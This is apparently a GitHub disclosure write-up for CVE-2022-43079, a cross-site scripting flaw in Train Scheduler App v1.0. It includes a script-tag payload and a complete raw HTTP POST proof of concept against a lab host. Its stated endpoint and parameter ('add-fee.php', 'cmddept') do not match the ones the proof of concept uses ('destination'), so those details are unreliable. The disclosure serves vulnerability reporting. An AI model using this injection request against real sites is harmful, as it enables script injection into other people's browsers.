Headline
CVE-2022-43079: CVE_Hunter/XSS-3.md at main · Tr0e/CVE_Hunter
A cross-site scripting (XSS) vulnerability in /admin/add-fee.php of Train Scheduler App v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cmddept parameter.
Vulnerability Description
Train Scheduler App v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the add-fee.php. It is an open source project from https://www.sourcecodester.com/. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cmddept parameter.
BUG_Author: Tr0e
vendors: sourcecodester.com;
The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
Vulnerability location: /train_scheduler_app/?id=&code=aaa&name=bbb&destination=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duration=60&eta=30
Vulnerability Verification
[+] Payload:
<script>alert(1)</script>
POC:
POST http://192.168.0.111:91/train_scheduler_app/ HTTP/1.1 Host: 192.168.0.111:91 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.0.111:91 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.0.111:91/train_scheduler_app/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=rbcvgagjbbad1bbrbb62nukgmc Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 92
id=&code=aaa&name=bbb&destination=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duration=60&eta=30
How to verify
Build the vulnerability environment according to the steps provided by the source code author and execute the Payload provided above.
The vulnerability is located at the “Save Schedule” function, you shuold inserts Payload when you add new file,as shown in the following figure: